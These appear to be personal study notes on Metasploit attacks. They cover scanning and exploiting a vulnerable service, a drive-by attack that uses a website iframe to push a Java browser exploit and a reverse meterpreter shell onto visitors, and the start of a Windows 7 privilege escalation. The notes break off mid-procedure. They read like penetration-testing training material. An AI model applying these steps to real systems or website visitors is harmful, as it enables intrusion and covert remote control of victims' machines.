Metasploit – Attacks

Direct Attack

The attack consists on locate a vulnerable service in a server and use an exploit to obtain access to the system.

Port scan and scanners to identify versions

Use auxiliary/scanner/portscan/tcp

Use auxiliary/scanner/smb/smb_version

Use auxiliary/scanner/http/http_version

Use show options and set <option> to configure the exploit

Search or download an exploit for the vulnerable service service.

If not available in Metasploit, copy rb file in the module/exploit/<system>/<service>/

use exploit/<system>/<service>/<explot>

Use show options and set <option> to configure the exploit

Execute run or exploit

A easy example to try this attack is the Easy File Management vulnerability.

Client Side Attack

It consist on waiting for clients to connect to a website, where they are redirected to the Metasploit device that is listening to a port. Then, Metasploit tries to run an exploit in the client machine.

Apache cofniguration

Setup a website with an iframe (or other elements) pointing to the port 8080 of the Metasploit machine

Configure a listening port in Metasploit prepared to answer with the Java exploit

Use exploit/multi/browser/<exploit>

Set uripath /

Set payload java/meterpreter/reverse_tcp

Set Target <- it allows to specify the system target, allowing more payload options, but limiting the scope of the attack to only that systems. (show target, set target).

Client should access to the website. The connection will be setup as a session in Metasploit.

As an option, initialautorunscript can be set in the payload to run a few commands as soon as the exploit is run in the client machine. This script can point to a rc file with more than one command.
set initialautorunscript ‘multi_console_command -rc /root/ncn.rc’

Java 7 update 5 can be exploited as example using the exploit java_jre17_jmxbean

Privilege escalation

When a exploit is run successfully in the victim, it usually provides non-admin rights to the meterpreter or the payload. In order to get Administrator rights or System rights, we need to do a privilege escalation. The process will depend on the victim system.

The objective of the attacker is to get a Meterpreter console with System rights (getuid command in meterpreter console will provide that information)

Windows 7 x64

Create a mterpreter payload application

use payload/windows/meterpreter/reverse_tcp

generate -f /root/test.exe (–> seems to create 32bits file… how to create this with 64bits?)

Create a handler to listen to the reverse meterpreter

use exploit/multi/handler

exploit -j (make it run in the background)

Get a remote meterpreter shell exploiting a known vulnerability (see direct attack or client side attacks)